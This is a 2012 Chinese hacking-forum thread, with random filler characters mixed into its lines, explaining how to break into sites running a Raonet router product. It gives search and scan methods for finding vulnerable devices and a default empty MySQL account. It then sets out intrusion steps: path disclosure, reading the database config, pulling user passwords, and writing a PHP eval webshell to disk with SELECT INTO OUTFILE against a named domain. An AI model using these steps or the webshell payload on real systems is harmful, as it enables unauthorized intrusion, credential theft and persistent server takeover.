找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3027|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
2 u8 V  W6 f7 ]8 g, W
+ L% H7 i8 w5 ~  ?' V1:google搜索'Raonet Subscriber Ethernet Router'
0 |1 m! [% g! e( Y# T& M9 m' s
6 m. v7 t( n: Y2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001) ?  g2 m# q7 o  h

  V8 ^. w! j/ f2 {0 s% N& a% s3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, q& v  v! D4 ]( C+ ?/ j) P
/ K% Y6 Y. g- p  n; T5 k: a7 b//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. B! Y+ O& E- h! t' C: g  {# k0 U3 t* u) n$ r/ `
) x9 Q- y2 Y$ G8 Q- [; a

3 e; s) @! W; |入侵步骤:
0 U& G2 V3 ~) J0 u) D- R) L* C9 V, d/ Z+ c" H+ b. |5 k7 K7 d) u
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
. a; W6 q- @" o# ~8 I& M3 t3 [
9 M9 n4 d! H: m" i2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc/ p  f( u" s0 X
3:得到密码后连接,查看GUI管理密码:
4 w' G' s9 F2 U9 ]! u/ Y2 Buse ser_500! |* S; B' c2 J1 d+ |. \& h1 O
select id,passwd from user;/ d8 z: ^1 Q# ^- V
4:通过数据库写入webshell,执行命令:6 N$ t, K1 I" o! y" ~7 v9 |
use mysql;
/ W7 D/ [! p9 B% w4 c: |+ pcreate table ok(cmd TEXT);0 @6 Q: y$ ~- R+ |6 u3 c
insert into ok values("<?php @eval($_POST[cmd])?>");3 Q$ M! a0 y. T% D
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# P7 S2 c. V9 N$ v1 ]. h) Pdrop table ok;0 R+ x6 H6 f; {2 d! [0 `9 A) R5 s

4 S' `2 ]0 ?6 X2 t, M5:连接后门shell.php 9 U! P6 N$ O$ N0 g2 O. O4 `3 A
5 c8 d( T" Y, E7 V5 f9 m& x3 s
6. 搞定!, X. L, j( [+ ?1 K6 l' W% ?

3 C7 k& y2 ~7 q, t# ?# P% H
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表